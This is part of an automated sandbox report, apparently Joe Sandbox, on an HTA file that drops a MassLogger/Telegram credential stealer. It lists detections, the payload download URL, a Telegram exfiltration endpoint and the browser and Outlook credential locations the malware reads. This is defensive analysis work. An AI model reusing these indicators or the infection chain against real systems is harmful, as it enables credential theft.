                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D34E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00D34E87
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D41E06 GetUserNameW,6_2_00D41E06
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D33F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_00D33F3A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00D049A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: csoss.exeBinary or memory string: WIN_81
                    Source: csoss.exeBinary or memory string: WIN_XP
                    Source: csoss.exeBinary or memory string: WIN_XPe
                    Source: csoss.exeBinary or memory string: WIN_VISTA
                    Source: csoss.exeBinary or memory string: WIN_7
                    Source: csoss.exeBinary or memory string: WIN_8
                    Source: csoss[1].exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2509390080.0000000002646000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D76283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00D76283
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D76747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00D76747

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		12
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter                    		2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		121
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts3
                    PowerShell                    		Logon Script (Windows)2
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares11
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS128
                    System Information Discovery                    		Distributed Component Object Model121
                    Input Capture                    		23
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    Masquerading                    		LSA Secrets331
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Valid Accounts                    		Cached Domain Credentials21
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640151 Sample: needagoodplanforsuccesstoge... Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 45 reallyfreegeoip.org 2->45 47 checkip.dyndns.org 2->47 49 checkip.dyndns.com 2->49 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 67 13 other signatures 2->67 10 mshta.exe 1 2->10         started        signatures3 65 Tries to detect the country of the analysis system (by using the IP) 45->65 process4 signatures5 77 Suspicious command line found 10->77 79 PowerShell case anomaly found 10->79 13 cmd.exe 1 10->13         started        process6 signatures7 81 Detected Cobalt Strike Beacon 13->81 83 Suspicious powershell command line found 13->83 85 PowerShell case anomaly found 13->85 16 powershell.exe 45 13->16         started        21 conhost.exe 13->21         started        process8 dnsIp9 43 23.95.235.28, 49695, 80 AS-COLOCROSSINGUS United States 16->43 35 C:\Users\user\AppData\Roaming\csoss.exe, PE32 16->35 dropped 37 C:\Users\user\AppData\Local\...\csoss[1].exe, PE32 16->37 dropped 39 C:\Users\user\AppData\...\43swuu3x.cmdline, Unicode 16->39 dropped 55 Loading BitLocker PowerShell Module 16->55 57 Powershell drops PE file 16->57 23 csoss.exe 2 16->23         started        26 csc.exe 3 16->26         started        file10 signatures11 process12 file13 69 Antivirus detection for dropped file 23->69 71 Multi AV Scanner detection for dropped file 23->71 73 Binary is likely a compiled AutoIt script file 23->73 75 4 other signatures 23->75 29 RegSvcs.exe 15 2 23->29         started        41 C:\Users\user\AppData\Local\...\43swuu3x.dll, PE32 26->41 dropped 33 cvtres.exe 1 26->33         started        signatures14 process15 dnsIp16 51 checkip.dyndns.com 158.101.44.242, 49696, 80 ORACLE-BMC-31898US United States 29->51 53 reallyfreegeoip.org 104.21.48.1, 443, 49697 CLOUDFLARENETUS United States 29->53 87 Tries to steal Mail credentials (via file / registry access) 29->87 89 Tries to harvest and steal browser information (history, passwords, etc) 29->89 signatures17

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    needagoodplanforsuccesstogetbackbest.hta41%VirustotalBrowse
                    needagoodplanforsuccesstogetbackbest.hta28%ReversingLabsScript-WScript.Trojan.Asthma

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\csoss.exe100%AviraTR/AD.SnakeStealer.ergur
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe100%AviraTR/AD.SnakeStealer.ergur
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe83%ReversingLabsWin32.Trojan.AutoitInject
                    C:\Users\user\AppData\Roaming\csoss.exe83%ReversingLabsWin32.Trojan.AutoitInject

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://23.95.235.28/120/csoss.ex0%Avira URL Cloudsafe
                    http://23.95.235.28/120/csoss.exeSs0%Avira URL Cloudsafe
                    http://23.95.235.28/120/csoss.exe0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		104.21.48.1
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		158.101.44.242
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            http://23.95.235.28/120/csoss.exetrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://checkip.dyndns.org/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://23.95.235.28/120/csoss.expowershell.exe, 00000003.00000002.1400376615.0000000004B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://reallyfreegeoip.orgdRegSvcs.exe, 00000007.00000002.2509390080.000000000258D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://checkip.dyndns.orgRegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://23.95.235.28/120/csoss.exeSspowershell.exe, 00000003.00000002.1413448646.0000000007C72000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://reallyfreegeoip.org/xml/8.46.123.189lRegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.comdRegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1400376615.0000000004661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.org/qcsoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://reallyfreegeoip.org/xml/8.46.123.189dRegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2509390080.000000000258D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://checkip.dyndns.orgdRegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://checkip.dyndns.comRegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://checkip.dyndns.org/dRegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1400376615.0000000004661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://api.telegram.org/bot-/sendDocument?chat_id=csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://reallyfreegeoip.org/xml/csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  104.21.48.1
                                                                                  		reallyfreegeoip.orgUnited States
                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                  23.95.235.28
                                                                                  		unknownUnited States
                                                                                  		36352AS-COLOCROSSINGUStrue
                                                                                  158.101.44.242
                                                                                  		checkip.dyndns.comUnited States
                                                                                  		31898ORACLE-BMC-31898USfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1640151
                                                                                  Start date and time:2025-03-17 01:17:55 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 7m 10s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:12
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
